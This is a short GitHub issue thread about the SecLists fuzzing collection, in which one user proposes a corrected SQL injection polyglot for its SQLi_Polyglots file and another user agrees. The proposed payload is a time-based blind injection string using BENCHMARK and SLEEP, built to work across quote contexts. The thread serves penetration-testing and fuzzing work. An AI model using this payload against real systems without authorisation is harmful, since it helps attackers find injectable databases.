### ISSUE TITLE
Potential error in SQLi Polyglot

### ISSUE THREAD

**Issue by gabemarshall** [danielmiessler/SecLists#69]
Hey guys, forgive me if I'm misunderstanding this Polyglot, but instead of the current value for line 2 of the [SQLi_Polyglots](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Polyglots/SQLi_Polyglots.txt) 

Shouldn't it be this instead? 

```
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
```

**Comment by g0tmi1k** [comment]
I agree!
